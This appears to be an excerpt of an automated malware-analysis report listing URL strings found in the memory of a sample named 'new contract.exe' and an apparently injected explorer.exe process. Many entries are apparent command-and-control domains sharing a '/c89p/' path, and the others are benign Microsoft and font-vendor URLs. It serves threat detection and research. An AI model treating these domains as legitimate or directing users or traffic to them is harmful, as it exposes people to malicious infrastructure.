Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.innivip.bio/c89p/www.aser-cap-hair-growth.today
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.innivip.bioReferer:
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ldkp.net
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ldkp.net/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ldkp.net/c89p/www.r64mh1.vip
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ldkp.netReferer:
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.livialiving.online
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.livialiving.online/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.livialiving.online/c89p/www.innivip.bio
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.livialiving.onlineReferer:
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.olar-systems-panels-61747.bond
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.olar-systems-panels-61747.bond/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.olar-systems-panels-61747.bond/c89p/www.arklife.shop
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.olar-systems-panels-61747.bondReferer:
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.oviepicker.net
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.oviepicker.net/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.oviepicker.net/c89p/www.hinawinner.top
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.oviepicker.netReferer:
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.plesacv.xyz
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.plesacv.xyz/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.plesacv.xyz/c89p/www.ldkp.net
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.plesacv.xyzReferer:
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.r64mh1.vip
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.r64mh1.vip/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.r64mh1.vip/c89p/www.aycare-service-99683.bond
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.r64mh1.vipReferer:
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: new contract.exe, 00000000.00000002.1743134989.0000000005904000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com8W
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sofaerb.shop
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sofaerb.shop/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sofaerb.shop/c89p/www.uickautoquote.net
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sofaerb.shopReferer:
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.torehousestudio.info
Source: explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.torehousestudio.info/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.torehousestudio.infoReferer:
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.uickautoquote.net
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.uickautoquote.net/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.uickautoquote.net/c89p/www.plesacv.xyz
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.uickautoquote.netReferer:
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.x-design-courses-29670.bond
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.x-design-courses-29670.bond/c89p/
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.x-design-courses-29670.bond/c89p/www.oviepicker.net
Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.x-design-courses-29670.bondReferer:
Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000003.00000002.4141038919.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1762772794.000000000C893000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000003.00000003.3484154679.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000003.00000003.3484154679.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000003.00000000.1743468048.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1744290511.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130757516.0000000003700000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000000.1752045440.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.0000000009701000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000000.1752045440.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.0000000009701000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
